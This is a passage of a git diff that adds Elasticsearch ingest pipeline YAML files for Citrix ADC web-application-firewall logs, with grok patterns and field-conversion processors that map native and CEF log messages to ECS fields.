set_source_ip_from_source_ip + copy_from: citrix_adc.log.source.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.port + tag: convert_source_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_source_port + copy_from: citrix_adc.log.source.port + ignore_empty_value: true + - set: + field: source.user.domain + tag: set_source_user_domain_from_caller_domain_name + copy_from: citrix_adc.log.caller.domain_name + ignore_empty_value: true + - set: + field: source.user.name + tag: set_source_user_name_from_caller_user_name + copy_from: citrix_adc.log.caller.user_name + ignore_empty_value: true + - convert: + field: citrix_adc.log.sequence_number + tag: convert_sequence_number_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.session_id + tag: convert_session_id_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/appfw_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/appfw_feature.yml new file mode 100644 index 00000000000..ad163fdebba --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/appfw_feature.yml @@ -0,0 +1,178 @@ +--- +description: Pipeline for Citrix Native messages of APPFW feature. +processors: + - grok: + description: Extract fields from message of APPFW feature. + tag: grok_appfw_feature + field: citrix.extended.message + patterns: + - '^XML%{SPACE}Mismatched%{SPACE}content-type%{SPACE}in%{SPACE}HTTP%{SPACE}header%{SPACE}detected%{SPACE}=%{SPACE}\"%{GREEDYDATA:citrix_adc.log.content_type_mismatch}\"\.$' + - '^Disallow%{SPACE}Deny%{SPACE}URL%{SPACE}for%{SPACE}rule%{SPACE}pattern%{SPACE}=%{SPACE}\"%{GREEDYDATA:citrix_adc.log.url}\"\.$' + - '^Unknown%{SPACE}content-type%{SPACE}header%{SPACE}value%{SPACE}=%{SPACE}\"%{GREEDYDATA:citrix_adc.log.unknown_content_type}\"\.$' + - "^parsing%{SPACE}referer%{SPACE}header%{SPACE}\\'%{GREEDYDATA:citrix_adc.log.referer_header}\\'%{SPACE}failed$" + - '^URL%{SPACE}length\(%{NUMBER:citrix_adc.log.url_length:int}\)%{SPACE}is%{SPACE}greater%{SPACE}than%{SPACE}maximum%{SPACE}allowed\(%{NUMBER:citrix_adc.log.max_allowed.url_length:int}\)\.$' + - '^Cookie%{SPACE}header%{SPACE}length\(%{NUMBER:citrix_adc.log.cookie_header_length:int}\)%{SPACE}is%{SPACE}greater%{SPACE}than%{SPACE}maximum%{SPACE}allowed\(%{NUMBER:citrix_adc.log.max_allowed.cookie_header_length:int}\)\.$' + - '^Header\(Referer\)%{SPACE}length\(%{NUMBER:citrix_adc.log.header_length:int}\)%{SPACE}is%{SPACE}greater%{SPACE}than%{SPACE}maximum%{SPACE}allowed\(%{NUMBER:citrix_adc.log.max_allowed.header_length:int}\)\.$' + - '^Query%{SPACE}string%{SPACE}length\(%{NUMBER:citrix_adc.log.query_string_length:int}\)%{SPACE}is%{SPACE}greater%{SPACE}than%{SPACE}maximum%{SPACE}allowed\(%{NUMBER:citrix_adc.log.max_allowed.query_string_length:int}\)\.$' + - '^Total%{SPACE}HTTP%{SPACE}header%{SPACE}length\(%{NUMBER:citrix_adc.log.total_http_header_length:int}\)%{SPACE}is%{SPACE}greater%{SPACE}than%{SPACE}maximum%{SPACE}allowed\(%{NUMBER:citrix_adc.log.max_allowed.total_http_header_length:int}\)\.$' + - '^Profile%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.profile}$' + - '^Field%{SPACE}Type%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.field_type}$' + - '^Field%{SPACE}Name%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.field_name}$' + - '^Content%{SPACE}length%{SPACE}is%{SPACE}too%{SPACE}large\(%{NUMBER:citrix_adc.log.content_length_bytes:long}%{SPACE}Bytes\).%{SPACE}Memory%{SPACE}Allocation%{SPACE}failed.$' + - '^Signature%{SPACE}id%{SPACE}%{NUMBER:citrix_adc.log.signature_id:int}%{SPACE}contains%{SPACE}no%{SPACE}fast%{SPACE}match%{SPACE}pattern$' + - '^Appfw%{SPACE}maximum%{SPACE}session%{SPACE}Limit%{SPACE}reached%{SPACE}for%{SPACE}PEID%{SPACE}%{NUMBER:citrix_adc.log.peid:int}$' + - '^APPFW%{SPACE}RFC%{SPACE}Profile:%{SPACE}%{GREEDYDATA:citrix_adc.log.appfw_rfc_profile}$' + - '^New%{SPACE}signature%{SPACE}available%{SPACE}:%{SPACE}RuleID%{SPACE}=%{SPACE}%{NUMBER:citrix_adc.log.rule_id:int}$' + - '^Learned%{SPACE}rule%{SPACE}will%{SPACE}be%{SPACE}auto-deployed%{SPACE}after%{SPACE}%{NUMBER:citrix_adc.log.auto_deploy_mins:int}mins.%{SPACE}ViolType%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.violation_type}.%{SPACE}Profile%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.profile}$' + - '^Rest%{SPACE}Validation%{SPACE}relaxation%{SPACE}rule%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.rule}%{SPACE}hit%{SPACE}at%{SPACE}url%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.url}$' + - '^gRPC%{SPACE}Validation%{SPACE}relaxation%{SPACE}rule%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.rule}%{SPACE}hit%{SPACE}at%{SPACE}url%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.url}$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - set: + field: http.request.referrer + tag: set_http_request_referrer_from_referer_header + copy_from: citrix_adc.log.referer_header + ignore_empty_value: true + - convert: + field: citrix_adc.log.rule_id + tag: convert_rule_id_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: rule.id + tag: set_rule_id_from_rule_id + copy_from: citrix_adc.log.rule_id + ignore_empty_value: true + - set: + field: url.original + tag: set_url_original_from_url + copy_from: citrix_adc.log.url + ignore_empty_value: true + - convert: + field: citrix_adc.log.peid + tag: convert_peid_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.signature_id + tag: convert_signature_id_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.url_length + tag: convert_url_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.max_allowed.url_length + tag: convert_max_allowed_url_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.cookie_header_length + tag: convert_cookie_header_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.max_allowed.cookie_header_length + tag: convert_max_allowed_cookie_header_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.header_length + tag: convert_header_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.max_allowed.header_length + tag: convert_max_allowed_header_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.query_string_length + tag: convert_query_string_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.max_allowed.query_string_length + tag: convert_max_allowed_query_string_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.total_http_header_length + tag: convert_total_http_header_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.max_allowed.total_http_header_length + tag: convert_max_allowed_total_http_header_length_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.content_length_bytes + tag: convert_content_length_bytes_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/bot_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/bot_feature.yml new file mode 100644 index 00000000000..0fe81be6652 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/bot_feature.yml @@ -0,0 +1,36 @@ +--- +description: Pipeline for Citrix Native messages of BOT feature. +processors: + - grok: + description: Extract fields from message of BOT feature. + tag: grok_bot_feature + field: citrix.extended.message + patterns: + - '^Bot%{SPACE}New%{SPACE}Signature%{SPACE}Available.%{SPACE}Newly%{SPACE}added%{SPACE}Rules%{SPACE}:%{SPACE}%{INT:citrix_adc.log.newly_added_rules}%{SPACE}Deleted%{SPACE}Rules%{SPACE}:%{SPACE}%{INT:citrix_adc.log.deleted_rules}$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - convert: + field: citrix_adc.log.newly_added_rules + tag: convert_newly_added_rules_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.deleted_rules + tag: convert_deleted_rules_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/cef.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/cef.yml new file mode 100644 index 00000000000..e66243fdda8 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/cef.yml @@ -0,0 +1,134 @@ +--- +description: Pipeline for Citrix CEF messages. +processors: + - set: + field: citrix.cef_format + tag: set_cef_format + value: true + # https://docs.citrix.com/en-us/citrix-adc/downloads/cef-log-components.pdf + - dissect: + field: citrix.detail + tag: dissect_detail + pattern: "CEF:%{citrix.cef_version}|%{citrix.device_vendor}|%{citrix.device_product}|%{citrix.device_version}|%{citrix.device_event_class_id}|%{citrix.name}|%{event.severity}|%{citrix.extended.message}" + - kv: + field: citrix.extended.message + tag: kv_extended_message + target_field: citrix.extended_kv + field_split: ' (?=[a-zA-Z][a-zA-Z0-9]*=)' + value_split: '=' + ignore_missing: true + - remove: + field: citrix.extended + tag: remove_extended + if: ctx.citrix?.extended_kv != null + + # https://docs.citrix.com/en-us/citrix-adc/current-release/application-firewall/logs.html#common-event-format-cef-logs + - convert: + # src – source IP address + field: citrix.extended_kv.src + tag: convert_extended_kv_src_to_ip + target_field: source.ip + type: ip + ignore_missing: true + - remove: + field: citrix.extended_kv.src + tag: remove_extended_kv_src + ignore_missing: true + - convert: + # spt – source port number + field: citrix.extended_kv.spt + tag: convert_extended_kv_spt_to_long + target_field: source.port + type: long + ignore_missing: true + - remove: + field: citrix.extended_kv.spt + tag: remove_extended_kv_spt + ignore_missing: true + - rename: + # method – Method (for example GET/POST) + field: citrix.extended_kv.method + tag: rename_extended_kv_method + target_field: http.request.method + ignore_missing: true + - rename: + # request – request URL + field: citrix.extended_kv.request + tag: rename_extended_kv_request + target_field: url.original + ignore_missing: true + - rename: + # action (for example blocked, transformed) + field: citrix.extended_kv.act + tag: rename_extended_kv_act + target_field: event.action + ignore_missing: true + - rename: + # message (Message regarding the observed security check violation) + field: citrix.extended_kv.msg + tag: rename_extended_kv_msg + target_field: message + ignore_missing: true + - rename: + # event ID + field: citrix.extended_kv.cn1 + tag: rename_extended_kv_cn1 + target_field: event.id + ignore_missing: true + - rename: + # HTTP Transaction ID + field: citrix.extended_kv.cn2 + tag: rename_extended_kv_cn2 + target_field: http.request.id + ignore_missing: true + - rename: + # profile name + field: citrix.extended_kv.cs1 + tag: rename_extended_kv_cs1 + target_field: citrix.profile_name + ignore_missing: true + - rename: + # PPE ID (for example PPE1) + field: citrix.extended_kv.cs2 + tag: rename_extended_kv_cs2 + target_field: citrix.ppe_id + ignore_missing: true + - rename: + # Session ID + field: citrix.extended_kv.cs3 + tag: rename_extended_kv_cs3 + target_field: citrix.session_id + ignore_missing: true + - rename: + # Severity (for example INFO, ALERT) + field: citrix.extended_kv.cs4 + tag: rename_extended_kv_cs4 + target_field: citrix.severity + ignore_missing: true + - rename: + # event year + field: citrix.extended_kv.cs5 + tag: rename_extended_kv_cs5 + target_field: citrix.event_year + ignore_missing: true + - rename: + # Signature Violation Category + field: citrix.extended_kv.cs6 + tag: rename_extended_kv_cs6 + target_field: citrix.signature_violation_category + ignore_missing: true + + - rename: + field: citrix.extended_kv + tag: rename_extended_kv + target_field: citrix.extended + ignore_missing: true + +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ci_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ci_feature.yml new file mode 100644 index 00000000000..36ed1743616 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ci_feature.yml @@ -0,0 +1,225 @@ +--- +description: Pipeline for Citrix Native messages of CI feature. +processors: + - grok: + description: Extract fields from message of CI feature. + tag: grok_ci_feature + field: citrix.extended.message + patterns: + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - Domain %{DATA:citrix_adc.log.domain} - Content-Type %{DATA:citrix_adc.log.content_type} - ICAP%{SPACE}Server %{IP:citrix_adc.log.icap_server.ip}:%{INT:citrix_adc.log.icap_server.port} - Mode %{WORD:citrix_adc.log.mode} - Service %{WORD:citrix_adc.log.service} - Response %{INT:citrix_adc.log.response.code} - Action %{WORD:citrix_adc.log.action}$' + - '^ID %{NUMBER:citrix_adc.log.id} - Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} Protocol %{WORD:citrix_adc.log.protocol} - URL %{URI:citrix_adc.log.url} - Domain %{DATA:citrix_adc.log.domain} - Service %{DATA:citrix_adc.log.service} - %{DATA}%{SPACE}%{DATA} - Action %{WORD:citrix_adc.log.action} - Bytes%{SPACE}Sent %{NUMBER:citrix_adc.log.bytes.sent} - Bytes%{SPACE}Received %{NUMBER:citrix_adc.log.bytes.received} - Origin%{SPACE}Server %{IP:citrix_adc.log.icap_server.ip}:%{INT:citrix_adc.log.icap_server.port}$' + - '^ID %{NUMBER:citrix_adc.log.id} - Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} Protocol %{WORD:citrix_adc.log.protocol} - URL %{URI:citrix_adc.log.url} - Domain %{DATA:citrix_adc.log.domain} - Service %{DATA:citrix_adc.log.service} - %{DATA}%{SPACE}%{DATA} - Action %{WORD:citrix_adc.log.action} - Request%{SPACE}Bytes%{SPACE}Sent %{NUMBER:citrix_adc.log.request.bytes_sent} - Response%{SPACE}Bytes%{SPACE}Sent %{NUMBER:citrix_adc.log.response.bytes_sent} - Origin%{SPACE}Server %{IP:citrix_adc.log.origin_server.ip}:%{INT:citrix_adc.log.origin_server.port}$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - convert: + field: citrix_adc.log.bytes.received + tag: convert_bytes_received_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.bytes + tag: set_destination_bytes_from_bytes_received + copy_from: citrix_adc.log.bytes.received + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.destination?.ip != null && ctx.citrix_adc.log.destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_destination_ip + copy_from: citrix_adc.log.destination.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.port + tag: convert_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_port_from_destination_port + copy_from: citrix_adc.log.destination.port + ignore_empty_value: true + - set: + field: event.action + tag: set_event_action_from_action + copy_from: citrix_adc.log.action + ignore_empty_value: true + - convert: + field: citrix_adc.log.response.code + tag: convert_response_code_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: http.response.status_code + tag: set_http_response_status_code_from_response_code + copy_from: citrix_adc.log.response.code + ignore_empty_value: true + - set: + field: network.protocol + tag: set_network_protocol_from_protocol + copy_from: citrix_adc.log.protocol + ignore_empty_value: true + - convert: + field: citrix_adc.log.icap_server.ip + tag: convert_icap_server_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.icap_server?.ip != null && ctx.citrix_adc.log.icap_server.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.ip + tag: set_server_ip_from_icap_server_ip + copy_from: citrix_adc.log.icap_server.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.origin_server.ip + tag: convert_origin_server_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.origin_server?.ip != null && ctx.citrix_adc.log.origin_server.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.ip + tag: set_server_ip_from_origin_server_ip + copy_from: citrix_adc.log.origin_server.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.icap_server.port + tag: convert_icap_server_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.port + tag: set_server_port_from_icap_server_port + copy_from: citrix_adc.log.icap_server.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.origin_server.port + tag: convert_origin_server_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.port + tag: set_server_port_from_origin_server_port + copy_from: citrix_adc.log.origin_server.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.bytes.sent + tag: convert_bytes_sent_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.bytes + tag: set_source_bytes_from_bytes_sent + copy_from: citrix_adc.log.bytes.sent + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.ip + tag: convert_source_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.source?.ip != null && ctx.citrix_adc.log.source.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_source_ip + copy_from: citrix_adc.log.source.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.port + tag: convert_source_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_source_port + copy_from: citrix_adc.log.source.port + ignore_empty_value: true + - set: + field: url.original + tag: set_url_original_from_url + copy_from: citrix_adc.log.url + ignore_empty_value: true + - set: + field: user.domain + tag: set_user_domain_from_domain + copy_from: citrix_adc.log.domain + ignore_empty_value: true + - convert: + field: citrix_adc.log.request.bytes_sent + tag: convert_request_bytes_sent_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.response.bytes_sent + tag: convert_response_bytes_sent_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.id + tag: convert_id_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/cvpn_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/cvpn_feature.yml new file mode 100644 index 00000000000..81a052e0ca0 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/cvpn_feature.yml @@ -0,0 +1,35 @@ +--- +description: Pipeline for Citrix Native messages of CVPN feature. +processors: + - grok: + description: Extract fields from message of CVPN feature. + tag: grok_cvpn_feature + field: citrix.extended.message + patterns: + - '^HTML_URL %{URI:citrix_adc.log.html_url}$' + - '^REWRITTEN_URL %{URI:citrix_adc.log.rewritten_url}$' + - '^MATCHED_URL %{URI:citrix_adc.log.matched_url}$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - set: + field: url.original + tag: set_url_original_from_html_url + copy_from: citrix_adc.log.html_url + ignore_empty_value: true + - set: + field: url.original + tag: set_url_original_from_rewritten_url + copy_from: citrix_adc.log.rewritten_url + ignore_empty_value: true + - set: + field: url.original + tag: set_url_original_from_matched_url + copy_from: citrix_adc.log.matched_url + ignore_empty_value: true +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..8a3315a25a4 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,199 @@ +--- +description: Pipeline for Citrix Web App Firewall logs. +processors: + - set: + field: ecs.version + tag: set_ecs_version + value: '8.12.0' + - set: + field: observer.vendor + tag: set_observer_vendor + value: 'Citrix' + - set: + field: observer.product + tag: set_observer_product + value: 'Netscaler' + - set: + field: observer.type + tag: set_observer_type + value: 'firewall' + - rename: + field: message + tag: rename_message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - grok: + description: Extract header details and message from log line. + tag: grok_event_original + field: event.original + patterns: + - '^%{SYSLOG_TIMESTAMP}( %{LEVEL} %{IP:client.ip:ip})?( %{HOSTNAME:citrix.hostname})? %{GREEDYDATA:citrix.detail}' + - '^%{GREEDYDATA:citrix.detail}' + pattern_definitions: + LEVEL: '?' + IDENT: '[a-zA-Z][a-zA-Z0-9]*' + SYSLOG_TIMESTAMP: '(?:%{SYSLOGTIMESTAMP:_tmp.timestamp}|%{TIMESTAMP_ISO8601:_tmp.timestamp8601})' + TIMESTAMP_ISO8601: '%{YEAR}-%{MONTHNUM}-%{MONTHDAY}[T ]%{HOUR}:?%{MINUTE}(?::?%{SECOND})?%{ISO8601_TIMEZONE:event.timezone}?' + - pipeline: + name: '{{ IngestPipeline "cef" }}' + tag: pipeline_cef + if: ctx.citrix?.detail != null && ctx.citrix.detail.startsWith("CEF:") + - pipeline: + name: '{{ IngestPipeline "native" }}' + tag: pipeline_native + if: ctx.citrix?.detail != null && !ctx.citrix.detail.startsWith("CEF:") + - convert: + field: event.severity + tag: convert_event_severity_to_long + type: long + ignore_missing: true + - set: + field: _conf.tz_offset + tag: set_tz_offset_utc + value: UTC + override: false + - set: + field: event.timezone + tag: set_event_timezone_from_tz_offset + copy_from: _conf.tz_offset + if: 